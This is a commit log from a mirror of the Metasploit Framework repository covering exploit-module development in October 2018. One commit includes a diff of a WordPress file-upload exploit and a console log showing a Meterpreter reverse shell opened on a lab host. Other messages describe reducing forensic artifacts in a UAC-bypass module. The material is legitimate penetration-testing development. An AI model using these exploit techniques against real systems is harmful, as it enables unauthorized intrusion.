infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
49,276 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

49276 Commits (a80ac67373d3c8b5b492dbf4a81c679b5d7cd7a5)

Author SHA1 Message Date
William Vu 458f635159 Add supported payloads to module description 2018-10-24 01:30:27 -05:00
William Vu 839c4e0467 Drop rank to AverageRanking for now 2018-10-24 01:30:17 -05:00
William Vu 37560760df Add RequiredCmd for generic and telnet 2018-10-24 01:23:15 -05:00
Elazar Broad ef2854c918
Use in-memory reflection for executing the payload 
Use to_win32pe_psh_reflection() instead of to_win32pe_psh_net() in order to reduce the amount of processes and forensic artifacts created by this module.
 2018-10-23 22:12:10 -04:00
Elazar Broad d75c599929
Use ShellExecuteA to spawn eventvwr.exe 
Use ShellExecuteA from railgun to spawn eventvwr.exe, as opposed to cmd /c. This reduces the amount of processes generated by this module.
 2018-10-23 21:52:36 -04:00
Elazar Broad da4b424780
Fix typo in cleanup message 2018-10-23 21:33:49 -04:00
bwatters-r7 569c2e03c9
Fix exploit relics and documentation 2018-10-23 17:15:34 -05:00
William Vu bf5fe2864f Update module doc 2018-10-23 16:28:49 -05:00
William Vu 67f2933b58 Make fewer assumptions about Apache 
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
 2018-10-23 16:26:17 -05:00
Shelby Pace 34ae9c38f9
added WebEx modules, arch check 2018-10-23 15:51:23 -05:00
Metasploit 51a8fee018
automatic module_metadata_base.json update 2018-10-23 10:34:37 -07:00
bwatters-r7 927a29530b
Remove duplicated files 2018-10-23 12:31:18 -05:00
Brent Cook 65c0573738
Land #10848, improve play_youtube post module 2018-10-23 12:26:55 -05:00
Jeffrey Martin efeacf8666
ensure os_flavor can be supplied for no Windows OS 2018-10-23 12:22:57 -05:00
Metasploit db9070449c
automatic module_metadata_base.json update 2018-10-23 10:14:24 -07:00
Brent Cook b65f467ada
Land #10851, add ndkstager to data/exploits 2018-10-23 12:04:57 -05:00
Brent Cook e992b63520
Land #10856, add SSL support to php meterpreter 2018-10-23 11:59:09 -05:00
Brent Cook e73a568839
Land #10855, Enable non-session command output for SSH modules 2018-10-23 11:58:16 -05:00
kr3bz be2ec76ed2
Added modified mercury_login.rb 
Modified the script with recommendations.
 2018-10-23 17:17:30 +02:00
William Vu 9c49acb924 Fail scanner instead of returning 2018-10-23 10:07:38 -05:00
William Vu 9c7a705868 Update module doc 2018-10-23 09:53:46 -05:00
William Vu 58a1b65e60 Update Exploit::CheckCode::Unknown 
Brain fart.
 2018-10-23 09:34:48 -05:00
William Vu 899238a4e3 Update libssh_auth_bypass with command output 2018-10-23 09:34:42 -05:00
William Vu 4182777488 Support SSH shell/exec channel request output 
Looks like channel[:data] was initialized but never used.
 2018-10-23 09:34:12 -05:00
Spencer McIntyre c71bbc1019 Remove spaces that msftidy caught 2018-10-23 10:13:44 -04:00
Brendan Coles 0e7259040d
Update modules/exploits/windows/imap/mercury_login.rb 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
 2018-10-23 14:32:53 +02:00
Brendan Coles 903f5e9ede
Update modules/exploits/windows/imap/mercury_login.rb 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
 2018-10-23 14:32:44 +02:00
Brendan Coles 0b37e29c9a
Update modules/exploits/windows/imap/mercury_login.rb 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
 2018-10-23 14:32:38 +02:00
Brendan Coles 43dd23042b
Update modules/exploits/windows/imap/mercury_login.rb 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
 2018-10-23 14:32:10 +02:00
William Vu 326597e842 Update module doc with new output 2018-10-23 07:14:19 -05:00
William Vu bdf2d44415 Augment check with Apache Server header 2018-10-23 07:04:14 -05:00
William Vu 0249f1a4af Improve check method and refactor 2018-10-23 06:20:31 -05:00
Ivan Racic ee3c663baf Upgraded exploit to work on any Windows target 
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.
 2018-10-23 12:11:56 +02:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links 
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
 2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure 
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
 2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu df23507772 Add module doc 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods 
And also check upload response.
 2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request 
This ensures we don't block on execution.
 2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
Spencer McIntyre 7c3e3da8d1 Add documentation for the play_youtube module 2018-10-22 20:50:41 -04:00
Spencer McIntyre 15e67de8fc Add the EMBED option for play_youtube.rb 2018-10-22 19:51:41 -04:00
William Vu f40647b2a4 Link to Docker environment in module doc 2018-10-22 18:32:37 -05:00
William Vu 3ca309423a Add check method to detect 4.3BSD fingerd 2018-10-22 18:32:37 -05:00